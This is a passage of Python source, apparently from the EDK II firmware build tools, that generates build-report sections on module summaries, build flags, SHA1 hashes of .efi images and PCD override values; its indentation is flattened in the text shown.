FileWrite(File, "From Library INF: %s" % self.LibraryDepex, True)
else:
FileWrite(File, self.Depex)
FileWrite(File, gSubSectionEnd)
##
# Reports dependency expression information
#
# This class reports the module build flags subsection in the build report file.
#
class BuildFlagsReport(object):
##
# Constructor function for class BuildFlagsReport
#
# This constructor function generates BuildFlagsReport object for
# a module. It reports the build tool chain tag and all relevant
# build flags to build the module.
#
# @param self The object pointer
# @param M Module context information
#
def __init__(self, M):
BuildOptions = {}
#
# Add build flags according to source file extension so that
# irrelevant ones can be filtered out.
#
for Source in M.SourceFileList:
Ext = os.path.splitext(Source.File)[1].lower()
if Ext in [".c", ".cc", ".cpp"]:
BuildOptions["CC"] = 1
elif Ext in [".s", ".asm"]:
BuildOptions["PP"] = 1
BuildOptions["ASM"] = 1
elif Ext in [".vfr"]:
BuildOptions["VFRPP"] = 1
BuildOptions["VFR"] = 1
elif Ext in [".dxs"]:
BuildOptions["APP"] = 1
BuildOptions["CC"] = 1
elif Ext in [".asl"]:
BuildOptions["ASLPP"] = 1
BuildOptions["ASL"] = 1
elif Ext in [".aslc"]:
BuildOptions["ASLCC"] = 1
BuildOptions["ASLDLINK"] = 1
BuildOptions["CC"] = 1
elif Ext in [".asm16"]:
BuildOptions["ASMLINK"] = 1
BuildOptions["SLINK"] = 1
BuildOptions["DLINK"] = 1
#
# Save module build flags.
#
self.ToolChainTag = M.ToolChain
self.BuildFlags = {}
for Tool in BuildOptions:
self.BuildFlags[Tool + "_FLAGS"] = M.BuildOption.get(Tool, {}).get("FLAGS", "")
##
# Generate report for module build flags information
#
# This function generates report for the module build flags expression.
#
# @param self The object pointer
# @param File The file object for report
#
def GenerateReport(self, File):
FileWrite(File, gSubSectionStart)
FileWrite(File, "Build Flags")
FileWrite(File, "Tool Chain Tag: %s" % self.ToolChainTag)
for Tool in self.BuildFlags:
FileWrite(File, gSubSectionSep)
FileWrite(File, "%s = %s" % (Tool, self.BuildFlags[Tool]), True)
FileWrite(File, gSubSectionEnd)
##
# Reports individual module information
#
# This class reports the module section in the build report file.
# It comprises of module summary, module PCD, library, dependency expression,
# build flags sections.
#
class ModuleReport(object):
##
# Constructor function for class ModuleReport
#
# This constructor function generates ModuleReport object for
# a separate module in a platform build.
#
# @param self The object pointer
# @param M Module context information
# @param ReportType The kind of report items in the final report file
#
def __init__(self, M, ReportType):
self.ModuleName = M.Module.BaseName
self.ModuleInfPath = M.MetaFile.File
self.ModuleArch = M.Arch
self.FileGuid = M.Guid
self.Size = 0
self.BuildTimeStamp = None
self.Hash = 0
self.DriverType = ""
if not M.IsLibrary:
ModuleType = M.ModuleType
if not ModuleType:
ModuleType = COMPONENT_TO_MODULE_MAP_DICT.get(M.ComponentType, "")
#
# If a module complies to PI 1.1, promote Module type to "SMM_DRIVER"
#
if ModuleType == SUP_MODULE_DXE_SMM_DRIVER:
PiSpec = M.Module.Specification.get("PI_SPECIFICATION_VERSION", "0x00010000")
if int(PiSpec, 0) >= 0x0001000A:
ModuleType = "SMM_DRIVER"
self.DriverType = gDriverTypeMap.get(ModuleType, "0x2 (FREE_FORM)")
self.UefiSpecVersion = M.Module.Specification.get("UEFI_SPECIFICATION_VERSION", "")
self.PiSpecVersion = M.Module.Specification.get("PI_SPECIFICATION_VERSION", "")
self.PciDeviceId = M.Module.Defines.get("PCI_DEVICE_ID", "")
self.PciVendorId = M.Module.Defines.get("PCI_VENDOR_ID", "")
self.PciClassCode = M.Module.Defines.get("PCI_CLASS_CODE", "")
self.BuildTime = M.BuildTime
self._BuildDir = M.BuildDir
self.ModulePcdSet = {}
if "PCD" in ReportType:
#
# Collect all module used PCD set: module INF referenced directly or indirectly.
# It also saves module INF default values of them in case they exist.
#
for Pcd in M.ModulePcdList + M.LibraryPcdList:
self.ModulePcdSet.setdefault((Pcd.TokenCName, Pcd.TokenSpaceGuidCName, Pcd.Type), (Pcd.InfDefaultValue, Pcd.DefaultValue))
self.LibraryReport = None
if "LIBRARY" in ReportType:
self.LibraryReport = LibraryReport(M)
self.DepexReport = None
if "DEPEX" in ReportType:
self.DepexReport = DepexReport(M)
if "BUILD_FLAGS" in ReportType:
self.BuildFlagsReport = BuildFlagsReport(M)
##
# Generate report for module information
#
# This function generates report for separate module expression
# in a platform build.
#
# @param self The object pointer
# @param File The file object for report
# @param GlobalPcdReport The platform global PCD report object
# @param GlobalPredictionReport The platform global Prediction report object
# @param GlobalDepexParser The platform global Dependency expression parser object
# @param ReportType The kind of report items in the final report file
#
def GenerateReport(self, File, GlobalPcdReport, GlobalPredictionReport, GlobalDepexParser, ReportType):
FileWrite(File, gSectionStart)
FwReportFileName = os.path.join(self._BuildDir, "OUTPUT", self.ModuleName + ".txt")
if os.path.isfile(FwReportFileName):
try:
FileContents = open(FwReportFileName).read()
Match = gModuleSizePattern.search(FileContents)
if Match:
self.Size = int(Match.group(1))
Match = gTimeStampPattern.search(FileContents)
if Match:
self.BuildTimeStamp = datetime.utcfromtimestamp(int(Match.group(1)))
except IOError:
EdkLogger.warn(None, "Fail to read report file", FwReportFileName)
if "HASH" in ReportType:
OutputDir = os.path.join(self._BuildDir, "OUTPUT")
DefaultEFIfile = os.path.join(OutputDir, self.ModuleName + ".efi")
if os.path.isfile(DefaultEFIfile):
Tempfile = os.path.join(OutputDir, self.ModuleName + "_hash.tmp")
# rebase the efi image since its base address may not zero
cmd = ["GenFw", "--rebase", str(0), "-o", Tempfile, DefaultEFIfile]
try:
PopenObject = subprocess.Popen(' '.join(cmd), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
except Exception as X:
EdkLogger.error("GenFw", COMMAND_FAILURE, ExtraData="%s: %s" % (str(X), cmd[0]))
EndOfProcedure = threading.Event()
EndOfProcedure.clear()
if PopenObject.stderr:
StdErrThread = threading.Thread(target=ReadMessage, args=(PopenObject.stderr, EdkLogger.quiet, EndOfProcedure))
StdErrThread.setName("STDERR-Redirector")
StdErrThread.setDaemon(False)
StdErrThread.start()
# waiting for program exit
PopenObject.wait()
if PopenObject.stderr:
StdErrThread.join()
if PopenObject.returncode != 0:
EdkLogger.error("GenFw", COMMAND_FAILURE, "Failed to generate firmware hash image for %s" % (DefaultEFIfile))
if os.path.isfile(Tempfile):
self.Hash = hashlib.sha1()
buf = open(Tempfile, 'rb').read()
if self.Hash.update(buf):
self.Hash = self.Hash.update(buf)
self.Hash = self.Hash.hexdigest()
os.remove(Tempfile)
FileWrite(File, "Module Summary")
FileWrite(File, "Module Name: %s" % self.ModuleName)
FileWrite(File, "Module Arch: %s" % self.ModuleArch)
FileWrite(File, "Module INF Path: %s" % self.ModuleInfPath)
FileWrite(File, "File GUID: %s" % self.FileGuid)
if self.Size:
FileWrite(File, "Size: 0x%X (%.2fK)" % (self.Size, self.Size / 1024.0))
if self.Hash:
FileWrite(File, "SHA1 HASH: %s *%s" % (self.Hash, self.ModuleName + ".efi"))
if self.BuildTimeStamp:
FileWrite(File, "Build Time Stamp: %s" % self.BuildTimeStamp)
if self.BuildTime:
FileWrite(File, "Module Build Time: %s" % self.BuildTime)
if self.DriverType:
FileWrite(File, "Driver Type: %s" % self.DriverType)
if self.UefiSpecVersion:
FileWrite(File, "UEFI Spec Version: %s" % self.UefiSpecVersion)
if self.PiSpecVersion:
FileWrite(File, "PI Spec Version: %s" % self.PiSpecVersion)
if self.PciDeviceId:
FileWrite(File, "PCI Device ID: %s" % self.PciDeviceId)
if self.PciVendorId:
FileWrite(File, "PCI Vendor ID: %s" % self.PciVendorId)
if self.PciClassCode:
FileWrite(File, "PCI Class Code: %s" % self.PciClassCode)
FileWrite(File, gSectionSep)
if "PCD" in ReportType:
GlobalPcdReport.GenerateReport(File, self.ModulePcdSet)
if "LIBRARY" in ReportType:
self.LibraryReport.GenerateReport(File)
if "DEPEX" in ReportType:
self.DepexReport.GenerateReport(File, GlobalDepexParser)
if "BUILD_FLAGS" in ReportType:
self.BuildFlagsReport.GenerateReport(File)
if "FIXED_ADDRESS" in ReportType and self.FileGuid:
GlobalPredictionReport.GenerateReport(File, self.FileGuid)
FileWrite(File, gSectionEnd)
def ReadMessage(From, To, ExitFlag):
while True:
# read one line a time
Line = From.readline()
# empty string means "end"
if Line is not None and Line != b"":
To(Line.rstrip().decode(encoding='utf-8', errors='ignore'))
else:
break
if ExitFlag.isSet():
break
##
# Reports platform and module PCD information
#
# This class reports the platform PCD section and module PCD subsection
# in the build report file.
#
class PcdReport(object):
##
# Constructor function for class PcdReport
#
# This constructor function generates PcdReport object a platform build.
# It collects the whole PCD database from platform DSC files, platform
# flash description file and package DEC files.
#
# @param self The object pointer
# @param Wa Workspace context information
#
def __init__(self, Wa):
self.AllPcds = {}
self.UnusedPcds = {}
self.ConditionalPcds = {}
self.MaxLen = 0
self.Arch = None
if Wa.FdfProfile:
self.FdfPcdSet = Wa.FdfProfile.PcdDict
else:
self.FdfPcdSet = {}
self.DefaultStoreSingle = True
self.SkuSingle = True
if GlobalData.gDefaultStores and len(GlobalData.gDefaultStores) > 1:
self.DefaultStoreSingle = False
if GlobalData.gSkuids and len(GlobalData.gSkuids) > 1:
self.SkuSingle = False
self.ModulePcdOverride = {}
for Pa in Wa.AutoGenObjectList:
self.Arch = Pa.Arch
#
# Collect all platform referenced PCDs and grouped them by PCD token space
# GUID C Names
#
for Pcd in Pa.AllPcdList:
PcdList = self.AllPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
if Pcd not in PcdList:
PcdList.append(Pcd)
if len(Pcd.TokenCName) > self.MaxLen:
self.MaxLen = len(Pcd.TokenCName)
#
# Collect the PCD defined in DSC/FDF file, but not used in module
#
UnusedPcdFullList = []
StructPcdDict = GlobalData.gStructurePcd.get(self.Arch, collections.OrderedDict())
for Name, Guid in StructPcdDict:
if (Name, Guid) not in Pa.Platform.Pcds:
Pcd = StructPcdDict[(Name, Guid)]
PcdList = self.AllPcds.setdefault(Guid, {}).setdefault(Pcd.Type, [])
if Pcd not in PcdList and Pcd not in UnusedPcdFullList:
UnusedPcdFullList.append(Pcd)
for item in Pa.Platform.Pcds:
Pcd = Pa.Platform.Pcds[item]
if not Pcd.Type:
# check the Pcd in FDF file, whether it is used in module first
for T in PCD_TYPE_LIST:
PcdList = self.AllPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(T, [])
if Pcd in PcdList:
Pcd.Type = T
break
if not Pcd.Type:
PcdTypeFlag = False
for package in Pa.PackageList:
for T in PCD_TYPE_LIST:
if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName, T) in package.Pcds:
Pcd.Type = T
PcdTypeFlag = True
if not Pcd.DatumType:
Pcd.DatumType = package.Pcds[(Pcd.TokenCName, Pcd.TokenSpaceGuidCName, T)].DatumType
break
if PcdTypeFlag:
break
if not Pcd.DatumType:
PcdType = Pcd.Type
# Try to remove Hii and Vpd suffix
if PcdType.startswith(TAB_PCDS_DYNAMIC_EX):
PcdType = TAB_PCDS_DYNAMIC_EX
elif PcdType.startswith(TAB_PCDS_DYNAMIC):
PcdType = TAB_PCDS_DYNAMIC
for package in Pa.PackageList:
if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName, PcdType) in package.Pcds:
Pcd.DatumType = package.Pcds[(Pcd.TokenCName, Pcd.TokenSpaceGuidCName, PcdType)].DatumType
break
PcdList = self.AllPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
UnusedPcdList = self.UnusedPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
if Pcd in UnusedPcdList:
UnusedPcdList.remove(Pcd)
if Pcd not in PcdList and Pcd not in UnusedPcdFullList:
UnusedPcdFullList.append(Pcd)
if len(Pcd.TokenCName) > self.MaxLen:
self.MaxLen = len(Pcd.TokenCName)
if GlobalData.gConditionalPcds:
for PcdItem in GlobalData.gConditionalPcds:
if '.' in PcdItem:
(TokenSpaceGuidCName, TokenCName) = PcdItem.split('.')
if (TokenCName, TokenSpaceGuidCName) in Pa.Platform.Pcds:
Pcd = Pa.Platform.Pcds[(TokenCName, TokenSpaceGuidCName)]
PcdList = self.ConditionalPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
if Pcd not in PcdList:
PcdList.append(Pcd)
UnusedPcdList = []
if UnusedPcdFullList:
for Pcd in UnusedPcdFullList:
if Pcd.TokenSpaceGuidCName + '.' + Pcd.TokenCName in GlobalData.gConditionalPcds:
continue
UnusedPcdList.append(Pcd)
for Pcd in UnusedPcdList:
PcdList = self.UnusedPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
if Pcd not in PcdList:
PcdList.append(Pcd)
for Module in Pa.Platform.Modules.values():
#
# Collect module override PCDs
#
for ModulePcd in Module.M.ModulePcdList + Module.M.LibraryPcdList:
TokenCName = ModulePcd.TokenCName
TokenSpaceGuid = ModulePcd.TokenSpaceGuidCName
ModuleDefault = ModulePcd.DefaultValue
ModulePath = os.path.basename(Module.M.MetaFile.File)
self.ModulePcdOverride.setdefault((TokenCName, TokenSpaceGuid), {})[ModulePath] = ModuleDefault
#
# Collect PCD DEC default value.
#
self.DecPcdDefault = {}
self._GuidDict = {}
for Pa in Wa.AutoGenObjectList:
for Package in Pa.PackageList:
Guids = Package.Guids
self._GuidDict.update(Guids)
for (TokenCName, TokenSpaceGuidCName, DecType) in Package.Pcds:
DecDefaultValue = Package.Pcds[TokenCName, TokenSpaceGuidCName, DecType].DefaultValue
self.DecPcdDefault.setdefault((TokenCName, TokenSpaceGuidCName, DecType), DecDefaultValue)
#
# Collect PCDs defined in DSC common section
#
self.DscPcdDefault = {}
for Pa in Wa.AutoGenObjectList:
for (TokenCName, TokenSpaceGuidCName) in Pa.Platform.Pcds:
DscDefaultValue = Pa.Platform.Pcds[(TokenCName, TokenSpaceGuidCName)].DscDefaultValue
if DscDefaultValue:
self.DscPcdDefault[(TokenCName, TokenSpaceGuidCName)] = DscDefaultValue
def GenerateReport(self, File, ModulePcdSet):
if not ModulePcdSet:
if self.ConditionalPcds:
self.GenerateReportDetail(File, ModulePcdSet, 1)
if self.UnusedPcds:
IsEmpty = True
for Token in self.UnusedPcds:
TokenDict = self.UnusedPcds[Token]
for Type in TokenDict:
if TokenDict[Type]:
IsEmpty = False
break
if not IsEmpty:
break
if not IsEmpty:
self.GenerateReportDetail(File, ModulePcdSet, 2)
self.GenerateReportDetail(File, ModulePcdSet)
##
# Generate report for PCD information
#
# This function generates report for separate module expression
# in a platform build.
#
# @param self The object pointer
# @param File The file object for report
# @param ModulePcdSet Set of all PCDs referenced by module or None for
# platform PCD report
# @param ReportySubType 0 means platform/module PCD report, 1 means Conditional
# directives section report, 2 means Unused Pcds section report
# @param DscOverridePcds Module DSC override PCDs set
#
def GenerateReportDetail(self, File, ModulePcdSet, ReportSubType = 0):
PcdDict = self.AllPcds
if ReportSubType == 1:
PcdDict = self.ConditionalPcds
elif ReportSubType == 2:
PcdDict = self.UnusedPcds
if not ModulePcdSet:
FileWrite(File, gSectionStart)
if ReportSubType == 1:
FileWrite(File, "Conditional Directives used by the build system")
elif ReportSubType == 2:
FileWrite(File, "PCDs not used by modules or in conditional directives")
else:
FileWrite(File, "Platform Configuration Database Report")
FileWrite(File, " *B - PCD override in the build option")
FileWrite(File, " *P - Platform scoped PCD override in DSC file")
FileWrite(File, " *F - Platform scoped PCD override in FDF file")
if not ReportSubType:
FileWrite(File, " *M - Module scoped PCD override")
FileWrite(File, gSectionSep)
else:
if not ReportSubType and ModulePcdSet:
#
# For module PCD sub-section
#
FileWrite(File, gSubSectionStart)
FileWrite(File, TAB_BRG_PCD)
FileWrite(File, gSubSectionSep)
AllPcdDict = {}
for Key in PcdDict:
AllPcdDict[Key] = {}
for Type in PcdDict[Key]:
for Pcd in PcdDict[Key][Type]:
AllPcdDict[Key][(Pcd.TokenCName, Type)] = Pcd
for Key in sorted(AllPcdDict):
#
# Group PCD by their token space GUID C Name
#
First = True
for PcdTokenCName, Type in sorted(AllPcdDict[Key]):
#
# Group PCD by their usage type
#
Pcd = AllPcdDict[Key][(PcdTokenCName, Type)]
TypeName, DecType = gPcdTypeMap.get(Type, ("", Type))
MixedPcdFlag = False
if GlobalData.MixedPcd:
for PcdKey in GlobalData.MixedPcd:
if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName) in GlobalData.MixedPcd[PcdKey]:
PcdTokenCName = PcdKey[0]
MixedPcdFlag = True
if MixedPcdFlag and not ModulePcdSet:
continue
#
# Get PCD default value and their override relationship
#
DecDefaultValue = self.DecPcdDefault.get((Pcd.TokenCName, Pcd.TokenSpaceGuidCName, DecType))
DscDefaultValue = self.DscPcdDefault.get((Pcd.TokenCName, Pcd.TokenSpaceGuidCName))
DscDefaultValBak = DscDefaultValue
Field = ''
for (CName, Guid, Field) in self.FdfPcdSet:
if CName == PcdTokenCName and Guid == Key:
DscDefaultValue = self.FdfPcdSet[(CName, Guid, Field)]
break
if DscDefaultValue != DscDefaultValBak:
try:
DscDefaultValue = ValueExpressionEx(DscDefaultValue, Pcd.DatumType, self._GuidDict)(True)
except BadExpression as DscDefaultValue:
EdkLogger.error('BuildReport', FORMAT_INVALID, "PCD Value: %s, Type: %s" %(DscDefaultValue, Pcd.DatumType))
InfDefaultValue = None
PcdValue = DecDefaultValue
if DscDefaultValue:
PcdValue = DscDefaultValue
#The DefaultValue of StructurePcd already be the latest, no need to update.
if not self.IsStructurePcd(Pcd.TokenCName, Pcd.TokenSpaceGuidCName):
Pcd.DefaultValue = PcdValue
if ModulePcdSet is not None:
if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName, Type) not in ModulePcdSet:
continue
InfDefaultValue, PcdValue = ModulePcdSet[Pcd.TokenCName, Pcd.TokenSpaceGuidCName, Type]
#The DefaultValue of StructurePcd already be the latest, no need to update.
if not self.IsStructurePcd(Pcd.TokenCName, Pcd.TokenSpaceGuidCName):
Pcd.DefaultValue = PcdValue
if InfDefaultValue:
try:
InfDefaultValue = ValueExpressionEx(InfDefaultValue, Pcd.DatumType, self._GuidDict)(True)
except BadExpression as InfDefaultValue:
EdkLogger.error('BuildReport', FORMAT_INVALID, "PCD Value: %s, Type: %s" % (InfDefaultValue, Pcd.DatumType))
if InfDefaultValue == "":
InfDefaultValue = None
BuildOptionMatch = False
if GlobalData.BuildOptionPcd:
for pcd in GlobalData.BuildOptionPcd:
if (Pcd.TokenSpaceGuidCName, Pcd.TokenCName) == (pcd[0], pcd[1]):
if pcd[2]:
continue
PcdValue = pcd[3]
#The DefaultValue of StructurePcd already be the latest, no need to update.
if not self.IsStructurePcd(Pcd.TokenCName, Pcd.TokenSpaceGuidCName):
Pcd.DefaultValue = PcdValue
BuildOptionMatch = True
break
if First:
if ModulePcdSet is None:
FileWrite(File, "")
FileWrite(File, Key)
First = False
if Pcd.DatumType in TAB_PCD_NUMERIC_TYPES:
if PcdValue.startswith('0') and not PcdValue.lower().startswith('0x') and \
len(PcdValue) > 1 and PcdValue.lstrip('0'):
PcdValue = PcdValue.lstrip('0')
PcdValueNumber = int(PcdValue.strip(), 0)
if DecDefaultValue is None:
DecMatch = True
else:
if DecDefaultValue.startswith('0') and not DecDefaultValue.lower().startswith('0x') and \
len(DecDefaultValue) > 1 and DecDefaultValue.lstrip('0'):
DecDefaultValue = DecDefaultValue.lstrip('0')
DecDefaultValueNumber = int(DecDefaultValue.strip(), 0)
DecMatch = (DecDefaultValueNumber == PcdValueNumber)
if InfDefaultValue is None:
InfMatch = True
else:
if InfDefaultValue.startswith('0') and not InfDefaultValue.lower().startswith('0x') and \
len(InfDefaultValue) > 1 and InfDefaultValue.lstrip('0'):
InfDefaultValue = InfDefaultValue.lstrip('0')
InfDefaultValueNumber = int(InfDefaultValue.strip(), 0)
InfMatch = (InfDefaultValueNumber == PcdValueNumber)
if DscDefaultValue is None:
DscMatch = True
else:
if DscDefaultValue.startswith('0') and not DscDefaultValue.lower().startswith('0x') and \
len(DscDefaultValue) > 1 and DscDefaultValue.lstrip('0'):
DscDefaultValue = DscDefaultValue.lstrip('0')
DscDefaultValueNumber = int(DscDefaultValue.strip(), 0)
DscMatch = (DscDefaultValueNumber == PcdValueNumber)
else:
if DecDefaultValue is None:
DecMatch = True
else:
DecMatch = (DecDefaultValue.strip() == PcdValue.strip())
if InfDefaultValue is None:
InfMatch = True
else:
InfMatch = (InfDefaultValue.strip() == PcdValue.strip())
if DscDefaultValue is None:
DscMatch = True
else:
DscMatch = (DscDefaultValue.strip() == PcdValue.strip())
IsStructure = False
if self.IsStructurePcd(Pcd.TokenCName, Pcd.TokenSpaceGuidCName):
IsStructure = True
if TypeName in ('DYNVPD', 'DEXVPD'):
SkuInfoList = Pcd.SkuInfoList
Pcd = GlobalData.gStructurePcd[self.Arch][(Pcd.TokenCName, Pcd.TokenSpaceGuidCName)]
Pcd.DatumType = Pcd.StructName
if TypeName in ('DYNVPD', 'DEXVPD'):
Pcd.SkuInfoList = SkuInfoList
if Pcd.PcdValueFromComm or Pcd.PcdFieldValueFromComm:
BuildOptionMatch = True
DecMatch = False
elif Pcd.PcdValueFromFdf or Pcd.PcdFieldValueFromFdf:
DscDefaultValue = True
DscMatch = True
DecMatch = False
elif Pcd.SkuOverrideValues:
DscOverride = False
if Pcd.DefaultFromDSC:
DscOverride = True
else:
DictLen = 0
for item in Pcd.SkuOverrideValues:
DictLen += len(Pcd.SkuOverrideValues[item])
if not DictLen:
DscOverride = False
else:
if not Pcd.SkuInfoList:
OverrideValues = Pcd.SkuOverrideValues
if OverrideValues:
for Data in OverrideValues.values():
Struct = list(Data.values())
if Struct:
DscOverride = self.ParseStruct(Struct[0])
break
else:
SkuList = sorted(Pcd.SkuInfoList.keys())
for Sku in SkuList:
SkuInfo = Pcd.SkuInfoList[Sku]
if SkuInfo.DefaultStoreDict:
DefaultStoreList = sorted(SkuInfo.DefaultStoreDict.keys())
for DefaultStore in DefaultStoreList:
OverrideValues = Pcd.SkuOverrideValues[Sku]
DscOverride = self.ParseStruct(OverrideValues[DefaultStore])
if DscOverride:
break
if DscOverride:
break
if DscOverride:
DscDefaultValue = True
DscMatch = True
DecMatch = False
else:
DecMatch = True
else:
DscDefaultValue = True
DscMatch = True
DecMatch = False
#
# Report PCD item according to their override relationship
#
if Pcd.DatumType == 'BOOLEAN':
if DscDefaultValue:
DscDefaultValue = str(int(DscDefaultValue, 0))
if DecDefaultValue:
DecDefaultValue = str(int(DecDefaultValue, 0))
if InfDefaultValue:
InfDefaultValue = str(int(InfDefaultValue, 0))
if Pcd.DefaultValue:
Pcd.DefaultValue = str(int(Pcd.DefaultValue, 0))
if DecMatch:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, ' ')
elif InfDefaultValue and InfMatch:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*M')
elif BuildOptionMatch:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*B')
else:
if DscDefaultValue and DscMatch:
if (Pcd.TokenCName, Key, Field) in self.FdfPcdSet:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*F')
else:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*P')
else:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*M')
if ModulePcdSet is None:
if IsStructure:
continue
if not TypeName in ('PATCH', 'FLAG', 'FIXED'):
continue
if not BuildOptionMatch:
ModuleOverride = self.ModulePcdOverride.get((Pcd.TokenCName, Pcd.TokenSpaceGuidCName), {})
for ModulePath in ModuleOverride:
ModuleDefault = ModuleOverride[ModulePath]
if Pcd.DatumType in TAB_PCD_NUMERIC_TYPES:
if ModuleDefault.startswith('0') and not ModuleDefault.lower().startswith('0x') and \
len(ModuleDefault) > 1 and ModuleDefault.lstrip('0'):
ModuleDefault = ModuleDefault.lstrip('0')
ModulePcdDefaultValueNumber = int(ModuleDefault.strip(), 0)
Match = (ModulePcdDefaultValueNumber == PcdValueNumber)
if Pcd.DatumType == 'BOOLEAN':
ModuleDefault = str(ModulePcdDefaultValueNumber)
else:
Match = (ModuleDefault.strip() == PcdValue.strip())
if Match:
continue
IsByteArray, ArrayList = ByteArrayForamt(ModuleDefault.strip())
if IsByteArray:
FileWrite(File, ' *M %-*s = %s' % (self.MaxLen + 15, ModulePath, '{'))
for Array in ArrayList:
FileWrite(File, Array)
else:
Value = ModuleDefault.strip()
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' *M %-*s = %s' % (self.MaxLen + 15, ModulePath, Value))
if ModulePcdSet is None:
FileWrite(File, gSectionEnd)
else:
if not ReportSubType and ModulePcdSet:
FileWrite(File, gSubSectionEnd)
def ParseStruct(self, struct):
HasDscOverride = False
if struct:
for _, Values in list(struct.items()):
for Key, value in Values.items():
if value[1] and value[1].endswith('.dsc'):
HasDscOverride = True
break
if HasDscOverride == True:
break
return HasDscOverride
def PrintPcdDefault(self, File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue):
if not DscMatch and DscDefaultValue is not None:
Value = DscDefaultValue.strip()
IsByteArray, ArrayList = ByteArrayForamt(Value)
if IsByteArray:
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DSC DEFAULT', "{"))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DSC DEFAULT', Value))
if not InfMatch and InfDefaultValue is not None:
Value = InfDefaultValue.strip()
IsByteArray, ArrayList = ByteArrayForamt(Value)
if IsByteArray:
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'INF DEFAULT', "{"))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'INF DEFAULT', Value))
if not DecMatch and DecDefaultValue is not None:
Value = DecDefaultValue.strip()
IsByteArray, ArrayList = ByteArrayForamt(Value)
if IsByteArray:
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DEC DEFAULT', "{"))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DEC DEFAULT', Value))
if IsStructure:
for filedvalues in Pcd.DefaultValues.values():
self.PrintStructureInfo(File, filedvalues)
if DecMatch and IsStructure:
for filedvalues in Pcd.DefaultValues.values():
self.PrintStructureInfo(File, filedvalues)
def PrintPcdValue(self, File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, Flag = ' '):
if not Pcd.SkuInfoList:
Value = Pcd.DefaultValue
IsByteArray, ArrayList = ByteArrayForamt(Value)
if IsByteArray:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '{'))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith('0') and not Value.lower().startswith('0x') and len(Value) > 1 and Value.lstrip('0'):
Value = Value.lstrip('0')
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', Value))
if IsStructure:
FiledOverrideFlag = False
if (Pcd.TokenCName,Pcd.TokenSpaceGuidCName) in GlobalData.gPcdSkuOverrides:
OverrideValues = GlobalData.gPcdSkuOverrides[(Pcd.TokenCName,Pcd.TokenSpaceGuidCName)]
else:
OverrideValues = Pcd.SkuOverrideValues
if OverrideValues:
for Data in OverrideValues.values():
Struct = list(Data.values())
if Struct:
OverrideFieldStruct = self.OverrideFieldValue(Pcd, Struct[0])
self.PrintStructureInfo(File, OverrideFieldStruct)
FiledOverrideFlag = True
break
if not FiledOverrideFlag and (Pcd.PcdFieldValueFromComm or Pcd.PcdFieldValueFromFdf):
OverrideFieldStruct = self.OverrideFieldValue(Pcd, {})
self.PrintStructureInfo(File, OverrideFieldStruct)
